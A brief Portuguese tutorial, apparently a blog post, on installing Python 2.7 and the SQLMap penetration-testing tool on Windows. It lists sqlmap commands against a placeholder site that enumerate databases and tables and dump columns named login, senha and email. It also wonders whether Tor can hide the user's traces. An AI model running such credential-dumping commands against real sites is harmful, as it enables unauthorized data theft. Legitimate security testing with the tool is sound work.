Tutorial simples de como instalar o SQLMap no Windows e alguns comandos basicos de como usar a ferramenta de Pentest.

Bom primeiro você vai precisar baixar o Python para que o SQLMap rode pois o SQLMap e uma ferramenta desenvolvida na linguagem de programação Python, para rodar a ferramenta e preciso do Python 2.7 instalado no seu sistema operacional, entrem nesse link e baixem a versão 2.7.12, após baixar vocês vão instalar ele sem dificuldades é só clicar no arquivo .exe e seguir os passos normais.

Download Python -> https://www.python.org/downloads/

Após fazer isso vocês vão no site do SQLMap e baixem o pacote .zip.

Download SQLMap -> http://sqlmap.org/

Comandos:

Terminando de baixar vocês vão extrair ele criar/deixar numa pasta de facil acesso (eu recomendo na area de trabalho).
EXEMPLO: criei na minha área de trabalho mesmo uma pasta com o nome de sqlmap e joguei todos os arquivos lá.
Após baixar e instalar o python e baixar e descompactar o SQLMap vcs vão abrir o CMD com permissão de admin e vão digitar os seguintes comandos:

cd
cd Users/
cd "o nome do seu usuario"
cd Desktop/
cd sqlmap/

Após acessarem a pasta do sqlmap é só digitar os comandos normais do sqlmap, exemplo:

sqlmap.py -u www.linkdosite.com.br --dbs
sqlmap.py -u www.linkdosite.com.br -D database --tables
sqlmap.py -u www.linkdosite.com.br -D database -T tabela --columns
sqlmap.py -u www.linkdosite.com.br -D database -T tabela -C login,senha,
email,senha

E assim vai…
Só não posso afirmar com propriedade se pelo windows é possivel usar o tor como camuflador de rastros…
Comandos Windows para saber o que tem dentro de pastas/diretórios.

dir
Comando para acessar os diretórios/pastas.

cd

Exemplo:

cd Users/